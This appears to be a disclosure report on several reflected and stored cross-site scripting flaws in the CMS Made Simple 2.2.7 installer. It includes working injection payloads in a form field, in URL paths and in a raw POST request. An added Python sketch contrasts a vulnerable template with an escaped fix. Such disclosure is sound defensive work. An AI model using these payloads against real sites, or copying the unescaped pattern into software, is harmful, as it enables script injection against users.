Summary:
Multiple reflected and stored XSS vulnerabilities in the 2.2.7 installation process
Detailed Description:
Steps to reproduce:
xss1:
http://127.0.0.1:7777/cmsms/cmsms-2.2.7-install.php/index.php/xxx?m92237b7a=4
1. Browse to install.php.
2. Click Next repeatedly until you reach the database configuration step.
3. Enter a database name containing an XSS payload such as:
   aaaa" onfocus="confirm(22)" autofocus a=""
4. Click Next; the XSS pop-up appears.
5. The remaining database fields are vulnerable to XSS as well.
xss2:
http://127.0.0.1:7777/cmsms/cmsms-2.2.7-install.php/index.phpcwd0n%3Cscript%3Ealert(1)%3C/script%3Eb08uu?m92237b7a=4
xss3:
POST /cmsms/cmsms-2.2.7-install.php/index.php/ffeh5"><script>alert(1)</script>x3xm3?m92237b7a=4 HTTP/1.1
Host: 127.0.0.1:7777
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:7777/cmsms/cmsms-2.2.7-install.php/index.php?m92237b7a=4
Content-Type: application/x-www-form-urlencoded
Content-Length: 4557
Cookie: CMSICc9f3718640=fnsl6c172501mu8gpd92f3f7hq
Connection: close
Upgrade-Insecure-Requests: 1

The POST body carries the same list of XSS vectors in each of the dbhost, dbname, dbuser and dbpass fields, followed by timezone=Europe%2FBerlin&next=Next+%E2%86%92.
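As an added illustration (not code from this report or from CMS Made Simple), a minimal Python model of the bug class behind all three findings: the installer form reflects the request path into its action attribute and the submitted database name into a value attribute. The vulnerable renderer echoes both verbatim; the fixed one percent-encodes the path segment and HTML-escapes both values for the attribute context. The field name dbname and the query parameter come from the report; the template shape and the function names are assumptions.

```python
import html
from urllib.parse import quote

# Constructed inputs mirroring the report: the attribute break-out entered
# in the "dbname" field (xss1) and markup placed in the path after
# index.php/ (xss2/xss3).
DBNAME_PAYLOAD = 'aaaa" onfocus="confirm(22)" autofocus a=""'
PATH_PAYLOAD = '/index.php/ffeh5"><script>alert(1)</script>x3xm3'


def render_vulnerable(path_info: str, dbname: str) -> str:
    """Hypothetical installer template that echoes the request path and the
    submitted value without any encoding (the pattern the report describes)."""
    return (f'<form action="{path_info}?m92237b7a=4" method="post">'
            f'<input name="dbname" value="{dbname}">'
            '</form>')


def render_fixed(path_info: str, dbname: str) -> str:
    """Same template with context-appropriate encoding of every untrusted value.

    quote() percent-encodes everything but unreserved characters and '/', so a
    path segment cannot carry quotes or angle brackets; html.escape(quote=True)
    encodes & < > " ' for the attribute context (PHP equivalent:
    htmlspecialchars($v, ENT_QUOTES, 'UTF-8')).
    """
    action = html.escape(quote(path_info, safe="/"), quote=True)
    value = html.escape(dbname, quote=True)
    return (f'<form action="{action}?m92237b7a=4" method="post">'
            f'<input name="dbname" value="{value}">'
            '</form>')


def breaks_out(rendered: str) -> bool:
    """Crude detection check: did either payload land as live markup, i.e. a
    new event-handler attribute or a new script element?"""
    return 'onfocus="' in rendered or '<script>' in rendered


if __name__ == "__main__":
    print("vulnerable:", breaks_out(render_vulnerable(PATH_PAYLOAD, DBNAME_PAYLOAD)))
    print("fixed:     ", breaks_out(render_fixed(PATH_PAYLOAD, DBNAME_PAYLOAD)))
```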